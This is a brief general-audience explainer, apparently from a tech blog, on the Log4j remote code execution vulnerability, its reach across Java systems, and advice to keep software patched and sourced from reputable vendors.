Log4j is a nearly omnipresent library across Java ecosystems. Its exact functions are a little esoteric, but it provides programmers with a useful set of tools to perform a wide number of tasks. However, there’s recently been a vulnerability found in this library that’s been making headlines. Let’s talk about what it does, how scary it is, and whether you can stop it.
To keep things simple, this exploit allows any user to gain total control over another machine remotely by executing a command. This can be done in a variety of ways, but critically, a bad actor can devise numerous ways of executing this comment on a program, as long as that program both runs on a JVM and has the Log4j library.
As an example, it’s actually possible for a user to take control of a computer running a Minecraft server if they get the proper setup – one that, in the grand scheme of things, isn’t that hard.
Java is among the most popular software platforms in the world. Billions of machines worldwide run programs on JVMs without even realizing it, many of which have this library in it. It’s almost certainly more likely than not that you yourself are susceptible to this vulnerability.
For this reason, the threat is to be taken very seriously. The ubiquity and popularity of the basis for the vulnerability makes it highly dangerous, and explains why it’s caused such a stir in the security community.
The answer to how to keep yourself safe is both refreshingly easy and deceptively difficult. The latest patches in the Log4j library have already fixed this vulnerability, so making sure everything you have is as up to date as possible is important; however, not all software developers keep their programs on the cutting edge.
For that reason, it’s possible that this vulnerability can linger for decades, even on your machines.
As always, you should be cautious about what software you choose to download and run on any of your machines; business, personal, mobile, or desktop. There are certainly other security weaknesses on them that haven’t hit the mainstream, so making sure you only trust reputable sources is vitally important.